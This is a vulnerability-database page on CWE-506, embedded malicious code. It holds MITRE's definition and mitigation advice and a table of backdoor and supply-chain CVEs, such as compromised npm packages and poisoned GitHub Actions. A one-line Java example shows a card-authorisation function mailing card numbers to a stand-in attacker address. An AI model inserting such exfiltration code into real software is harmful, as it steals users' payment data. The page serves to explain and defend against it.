Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-506 (内嵌的恶意代码) — Vulnerability Class 78

78 vulnerabilities classified as CWE-506 (内嵌的恶意代码). AI Chinese analysis included.

CWE-506 represents a critical integrity weakness where software contains intentionally embedded malicious code, often disguised as legitimate functionality. This flaw typically manifests as Trojan horses, trapdoors, or logic bombs, allowing developers or insiders to subvert system security at a predetermined time or under specific conditions. Exploitation occurs when the hidden code executes, granting unauthorized access, stealing data, or disrupting operations while the primary application appears to function normally. To mitigate this risk, organizations must enforce strict code review processes and utilize automated static analysis tools to detect suspicious patterns. Additionally, implementing robust access controls and maintaining transparent development practices ensure that no hidden backdoors remain in the final product, thereby preserving trust and preventing insider threats from compromising system integrity.

MITRE CWE Description
The product contains code that appears to be malicious in nature. Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
Mitigations (1)
Implementation, OperationRemove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
Examples (1)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
CVE IDTitleCVSSSeverityPublished
CVE-2026-6443 Essentialplugin Plugins (Various Versions) - Injected Backdoor — Accordion and Accordion Slider 9.8 Critical2026-04-17
CVE-2026-34424 Smart Slider 3 Pro 3.5.1.35 Supply Chain Attack Remote Access Toolkit — Smart Slider 3 Pro for WordPress 9.8 Critical2026-04-09
CVE-2026-33634 Trivy ecosystem supply chain briefly compromised — setup-trivy 7.4 -2026-03-23
CVE-2026-31976 xygeni-action v5 tag poisoned with C2 backdoor — xygeni-action 8.8AIHighAI2026-03-11
CVE-2026-28353 Trivy Vulnerability Scanner: Unauthorized AI Agent Execution Code Included in OpenVSX Extension Release — trivy-vscode-extension 5.5 -2026-03-05
CVE-2024-10938 OVRI Payment 1.7.0 - Malicious .htaccess directive — OVRI Payment 6.5 Medium2026-02-27
CVE-2025-59374 ASUS Live Update 安全漏洞 — live update 8.1AIHighAI2025-12-17
CVE-2018-25117 VestaCP Debian Installer Malicious Backdoor Supply Chain Compromise — Control Panel (CP) 8.8AIHighAI2025-10-15
CVE-2017-20203 NetSarang v5.0 Malicious Backdoor Supply Chain Compromise — Xmanager Enterprise 10.0AICriticalAI2025-10-09
CVE-2017-20202 Web Developer for Chrome v0.4.9 Malicious Backdoor Supply Chain Compromise — Web Developer for Chrome 8.8AIHighAI2025-10-08
CVE-2017-20201 CCleaner v5.33.6162 & CCleaner Cloud v1.07.3191 Malicious Backdoor Supply Chain Compromise — CCleaner 9.8AICriticalAI2025-10-08
CVE-2025-10894 Nx: nx/devkit: malicious versions of nx and plugins published to npm 9.6 Critical2025-09-24
CVE-2025-59145 color-name@2.0.1 contains malware after npm account takeover — color-name 6.1AIMediumAI2025-09-15
CVE-2025-59331 is-arrayish@0.3.3 contains malware after npm account takeover — node-is-arrayish 8.2AIHighAI2025-09-15
CVE-2025-59330 error-ex@1.3.3 contains malware after npm account takeover — node-error-ex 8.2AIHighAI2025-09-15
CVE-2025-59162 color-convert@3.1.1 contains malware after npm account takeover — color-convert 5.4AIMediumAI2025-09-15
CVE-2025-59142 color-string@2.1.1 contains malware after npm account takeover — color-string 8.2AIHighAI2025-09-15
CVE-2025-59144 debug@4.4.2 contains malware after npm account takeover — debug 6.1AIMediumAI2025-09-15
CVE-2025-59143 color@5.0.1 contains malware after npm account takeover — color 6.1AIMediumAI2025-09-15
CVE-2025-59141 simple-swizzle@0.2.3 contains malware after npm account takeover — node-simple-swizzle 6.1AIMediumAI2025-09-15
CVE-2025-59140 backslash@0.2.1 contains malware after npm account takeover — node-backslash 6.1AIMediumAI2025-09-15
CVE-2025-59039 Prebid Universal Creative on npm briefly compromised — prebid-universal-creative 9.8AICriticalAI2025-09-09
CVE-2025-59038 Prebid.js NPM package briefly compromised — Prebid.js 8.2AIHighAI2025-09-09
CVE-2025-59037 DuckDB NPM packages 1.3.3 and 1.29.2 briefly compromised with malware — duckdb-node 9.1AICriticalAI2025-09-09
CVE-2025-8217 Inert Malicious script injected into Amazon Q Developer Visual Studio Code (VS Code) Extension — Q Developer VS Code Extension 4.0 Medium2025-07-30
CVE-2025-54313 eslint-config-prettier 安全漏洞 — eslint-config-prettier 7.5 High2025-07-19
CVE-2025-32965 Compromised xrpl.js versions 4.2.1, 4.2.2, 4.2.3, 4.2.4, and 2.14.2 — xrpl.js 7.5 -2025-04-22
CVE-2025-30154 Multiple Reviewdog actions were compromised during a specific time period — reviewdog 8.6 High2025-03-19
CVE-2025-30066 changed-files 安全漏洞 — changed-files 8.6 High2025-03-15
CVE-2024-4978 Malicious Code in Justice AV Solutions (JAVS) Viewer — Viewer 8.4 High2024-05-23

Vulnerabilities classified as CWE-506 (内嵌的恶意代码) represent 78 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.